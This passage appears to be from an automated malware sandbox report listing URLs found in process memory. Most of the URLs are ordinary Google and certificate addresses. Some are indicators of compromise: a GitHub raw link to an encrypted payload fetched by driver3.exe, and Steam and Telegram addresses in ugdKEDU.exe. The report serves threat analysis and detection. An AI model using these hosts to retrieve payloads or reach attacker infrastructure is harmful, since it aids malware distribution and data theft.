Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3237387069.00002AD800DE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3237387069.00002AD800DE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3237387069.00002AD800DE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 0000002E.00000002.3236559772.00002AD800CC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/issues/166475273v
Source: LCESjzR.exe, 0000001D.00000000.2902504955.00000000002B1000.00000020.00000001.01000000.00000013.sdmp String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: chrome.exe, 0000002E.00000002.3229714741.00002AD800484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232729061.00002AD800729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238716176.00002AD800F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232932825.00002AD80074C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 0000002E.00000002.3229714741.00002AD800484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232729061.00002AD800729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238716176.00002AD800F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232932825.00002AD80074C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 0000002E.00000002.3308805539.000046880080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3235163598.00002AD800A34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 0000002E.00000002.3241550410.0000468800237000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3265636523.0000468800770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232932825.00002AD80074C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 0000002E.00000003.3097904195.0000468800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3098282511.000046880039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3308805539.000046880080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 0000002E.00000002.3241550410.0000468800237000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3265636523.0000468800770000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardF
Source: chrome.exe, 0000002E.00000003.3097904195.0000468800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3098282511.000046880039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3308805539.000046880080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 0000002E.00000002.3265636523.0000468800770000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 0000002E.00000002.3308805539.000046880080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3235163598.00002AD800A34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 0000002E.00000002.3229445638.00002AD80041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160388867.00002AD801438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160508166.00002AD801504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160461980.00002AD801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238174485.00002AD800ED8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159601893.00002AD801378000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search?source=ntp
Source: chrome.exe, 0000002E.00000003.3139138765.00002AD8006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3139457002.00002AD80123C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3140105334.00002AD800ECC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3139722722.00002AD8012A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 0000002E.00000003.3139138765.00002AD8006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3139457002.00002AD80123C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3140105334.00002AD800ECC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3139722722.00002AD8012A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 0000002E.00000003.3107257230.00004688006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3264131371.0000468800744000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 0000002E.00000002.3308805539.000046880080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 0000002E.00000002.3271495996.000046880078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
Source: chrome.exe, 0000002E.00000002.3271495996.000046880078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918
Source: chrome.exe, 0000002E.00000002.3228680189.00002AD80020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 0000002E.00000002.3228680189.00002AD80020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://m.google.com/devicemanagement/data/apip
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 0000002E.00000002.3229445638.00002AD80041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160388867.00002AD801438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160508166.00002AD801504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160461980.00002AD801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238174485.00002AD800ED8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159601893.00002AD801378000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 0000002E.00000002.3229296923.00002AD80039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234759298.00002AD8009A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 0000002E.00000002.3233046357.00002AD800794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3239699523.00002AD801108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3229669379.00002AD800458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 0000002E.00000002.3233203559.00002AD8007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3239412525.00002AD8010BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234459258.00002AD800948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3229669379.00002AD800458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 0000002E.00000002.3239412525.00002AD8010BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacyp
Source: chrome.exe, 0000002E.00000002.3233203559.00002AD8007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3239412525.00002AD8010BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3229669379.00002AD800458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 0000002E.00000002.3239412525.00002AD8010BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhoneEn
Source: chrome.exe, 0000002E.00000002.3239412525.00002AD8010BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3229669379.00002AD800458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 0000002E.00000002.3234459258.00002AD80095B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3136642421.00002AD800F7B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3135346493.00002AD800ECC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234759298.00002AD8009A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: powershell.exe, 00000001.00000002.2194388552.00000000062FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: chrome.exe, 0000002E.00000002.3228574507.00002AD8001D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 0000002E.00000002.3228680189.00002AD80020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 0000002E.00000003.3160461980.00002AD801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159601893.00002AD801378000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 0000002E.00000002.3235461744.00002AD800AA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 0000002E.00000003.3160461980.00002AD801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159601893.00002AD801378000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 0000002E.00000003.3160461980.00002AD801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159601893.00002AD801378000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 0000002E.00000002.3239143501.00002AD800FEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238174485.00002AD800ED8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 0000002E.00000002.3239143501.00002AD800FEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234759298.00002AD8009A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238174485.00002AD800ED8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 0000002E.00000002.3239143501.00002AD800FEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 0000002E.00000002.3239143501.00002AD800FEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3233890752.00002AD800874000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238174485.00002AD800ED8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 0000002E.00000002.3239143501.00002AD800FEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238174485.00002AD800ED8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 0000002E.00000002.3239143501.00002AD800FEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3228918464.00002AD8002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238174485.00002AD800ED8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 0000002E.00000002.3239143501.00002AD800FEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238174485.00002AD800ED8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 0000002E.00000002.3239143501.00002AD800FEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 0000002E.00000002.3229714741.00002AD800484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 0000002E.00000002.3234459258.00002AD80095B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3136642421.00002AD800F7B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3135346493.00002AD800ECC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234759298.00002AD8009A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 0000002E.00000003.3139138765.00002AD8006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3139457002.00002AD80123C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3139722722.00002AD8012A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chrome.exe, 0000002E.00000002.3234759298.00002AD8009A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: driver3.exe, 00000020.00000003.2975099151.0000020E7B3D9000.00000004.00000020.00020000.00000000.sdmp, driver3.exe, 00000020.00000002.3222957219.0000020E7B36C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/lordx1555/update/main/fox.zip.enc
Source: driver3.exe, 00000020.00000002.3346748725.00007FF7C00B5000.00000002.00000001.01000000.00000017.sdmp, driver3.exe, 00000020.00000000.2961620464.00007FF7C00B5000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: https://raw.githubusercontent.com/lordx1555/update/main/fox.zip.encDownload
Source: chrome.exe, 0000002E.00000002.3228021851.00002AD80009C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: LCESjzR.tmp, 0000001E.00000002.3071709090.00000000008EC000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: chrome.exe, 0000002E.00000002.3228574507.00002AD8001D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 0000002E.00000002.3229714741.00002AD800484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232729061.00002AD800729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238716176.00002AD800F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232932825.00002AD80074C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002E.00000002.3229714741.00002AD800484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232729061.00002AD800729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238716176.00002AD800F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232932825.00002AD80074C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 0000002E.00000003.3159463865.00002AD8002B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 0000002E.00000002.3229445638.00002AD80041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160388867.00002AD801438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160508166.00002AD801504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160461980.00002AD801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159601893.00002AD801378000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: ugdKEDU.exe, 0000001F.00000002.3022168712.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, ugdKEDU.exe, 00000022.00000002.3495642372.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199819539662
Source: ugdKEDU.exe, 00000022.00000002.3495642372.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199819539662go2dnizMozilla/5.0
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/
Source: ugdKEDU.exe, 0000001F.00000002.3022168712.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, ugdKEDU.exe, 00000022.00000002.3495642372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, ugdKEDU.exe, 00000022.00000002.3517161138.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp, ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/sc1phell
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/sc1phellU
Source: ugdKEDU.exe, 00000022.00000002.3495642372.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/sc1phellgo2dnizMozilla/5.0
Source: chrome.exe, 0000002E.00000002.3235016954.00002AD8009F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 0000002E.00000002.3228574507.00002AD8001D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: Macromedia.com, 00000017.00000003.3339397288.00000000018F4000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 00000017.00000003.2806689913.000000000437C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: skotes.exe, 0000000A.00000002.3535140516.00000000008C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.certum.pl/CPS0
Source: LCESjzR.tmp, 0000001E.00000002.3071709090.00000000008EC000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: ugdKEDU.exe, 00000022.00000002.3565393312.0000000003945000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3236324182.00002AD800C40000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 0000002E.00000002.3236503899.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3133512710.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160795120.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3144041851.00002AD800CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3138932472.00002AD800CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 0000002E.00000002.3236503899.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3133512710.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160795120.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3144041851.00002AD800CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3138932472.00002AD800CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 0000002E.00000002.3236503899.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3133512710.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160795120.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3144041851.00002AD800CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3138932472.00002AD800CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: ugdKEDU.exe, 0000001F.00000002.3022168712.0000000003C19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.entrust.net/rpa0
Source: Macromedia.com, 00000017.00000003.2806689913.000000000437C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/0
Source: chrome.exe, 0000002E.00000003.3143311727.00002AD8002AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159463865.00002AD8002B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 0000002E.00000002.3239857447.00002AD8011B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159463865.00002AD8002B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 0000002E.00000003.3159463865.00002AD8002B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 0000002E.00000003.3136534048.00002AD800D64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 0000002E.00000002.3235632446.00002AD800ADC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 0000002E.00000002.3232988567.00002AD800764000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Charii3
Source: chrome.exe, 0000002E.00000002.3235730253.00002AD800B08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 0000002E.00000002.3240366901.00002AD801238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 0000002E.00000002.3239640072.00002AD8010FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3228574507.00002AD8001D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3233295806.00002AD8007DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234262741.00002AD8008F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 0000002E.00000002.3239640072.00002AD8010FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3228574507.00002AD8001D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3233295806.00002AD8007DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234262741.00002AD8008F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 0000002E.00000002.3230592826.00002AD8005E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3236270361.00002AD800C28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3229669379.00002AD800458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 0000002E.00000002.3229445638.00002AD80041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160388867.00002AD801438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160508166.00002AD801504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160461980.00002AD801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238174485.00002AD800ED8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159601893.00002AD801378000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
Source: chrome.exe, 0000002E.00000003.3159601893.00002AD801378000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 0000002E.00000003.3139722722.00002AD8012A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 0000002E.00000002.3229714741.00002AD800484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 0000002E.00000002.3235357971.00002AD800A80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 0000002E.00000003.3143311727.00002AD8002AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
Source: chrome.exe, 0000002E.00000002.3227797865.00002AD80001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 0000002E.00000002.3228680189.00002AD80020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 0000002E.00000002.3228680189.00002AD80020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 0000002E.00000002.3228680189.00002AD80020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
